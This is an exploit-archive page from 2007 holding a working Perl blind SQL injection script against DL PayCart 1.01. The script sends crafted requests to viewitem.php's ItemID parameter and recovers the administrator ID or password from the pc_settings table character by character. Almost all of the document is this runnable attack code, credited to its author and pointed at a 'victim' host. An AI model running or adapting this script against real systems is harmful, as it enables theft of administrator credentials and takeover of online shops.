Home / exploits paycart-sql.txt
Posted on 29 August 2007
#!/usr/bin/perl -w use HTTP::Request; use LWP::UserAgent; #--------------------------------------------------------------------------------- # scripts : DL PayCart 1.01 - (c) 2006 # Discovered By : irvian # scripts site : http://www.dinkumsoft.com/ # Thanks To # bot : sqlscan, hantu_internet, xcart # chanell : #hitamputih #nyubicrew #patihack and my private channel noscan # Friend : nyubi, ibnusina, arioo, jipank,ifx and all my friend #--------------------------------------------------------------------------------- if (@ARGV < 2){ die " use : $0 host option example : $0 http://victim.com 1 1= AdminID 2= AdminPass ";} $url = $ARGV[0]; $option = $ARGV[1]; print " [+]-----------------------------------------[+] "; print "[+]Blind SQL injection [+] "; print "[+]DL PayCart 1.01 - (c) 2006 [+] "; print "[+]code by irvian [+] "; print "[+]special To : ifx, arioo, jipank [+] "; print "[+]-----------------------------------------[+] "; if ($option eq 1){ syswrite(STDOUT, "AdminID: ", 9);} elsif ($option eq 2){ syswrite(STDOUT, "AdminPass: ", 11);} for($i = 1; $i <= 32; $i++){ $f = 0; $n = 32; while(!$f && $n <= 255) { if(&blind($url, $option, $i, $n,)){ $f = 1; syswrite(STDOUT, chr($n), 1); } $n++; } } print " [+]finish Execution Exploit "; sub blind { my $site = $_[0]; my $op = $_[1]; my $az = $_[2]; my $na = $_[3]; if ($op eq 1){$klm = "AdminID";} elsif ($op eq 2){$klm = "AdminPass";} $blind = "$site"."/viewitem.php?ItemID=1'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $req = $b->request(HTTP::Request->new(GET=>$blind)); $res = $req->content; if ($res !~ /noimage.gif/i){ return 1; } }